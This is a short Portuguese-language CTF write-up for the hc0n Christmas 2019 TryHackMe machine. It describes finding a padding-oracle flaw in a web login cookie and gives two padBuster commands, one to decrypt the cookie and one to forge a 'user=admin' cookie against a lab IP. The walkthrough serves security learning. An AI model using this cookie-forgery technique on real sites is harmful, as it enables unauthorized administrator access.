hacktricks/ctf-write-ups/try-hack-me/hc0n-christmas-ctf-2019.md

4.2 KiB

hc0n Christmas CTF - 2019

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥

Enumeração

Comecei enumerando a máquina usando minha ferramenta Legion:

Existem 2 portas abertas: 80 (HTTP) e 22 (SSH)

Na página da web, você pode registrar novos usuários, e notei que o comprimento do cookie depende do comprimento do nome de usuário indicado:

E se você alterar algum byte do cookie, você recebe este erro:

Com essa informação e lendo a vulnerabilidade do oráculo de preenchimento consegui explorá-la:

perl ./padBuster.pl http://10.10.231.5/index.php "GVrfxWD0mmxRM0RPLht/oUpybgnBn/Oy" 8 -encoding 0 -cookies "hcon=GVrfxWD0mmxRM0RPLht/oUpybgnBn/Oy"

Definir usuário como administrador:

perl ./padBuster.pl http://10.10.231.5/index.php "GVrfxWD0mmxRM0RPLht/oUpybgnBn/Oy" 8 -encoding 0 -cookies "hcon=GVrfxWD0mmxRM0RPLht/oUpybgnBn/Oy" -plaintext "user=admin"

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥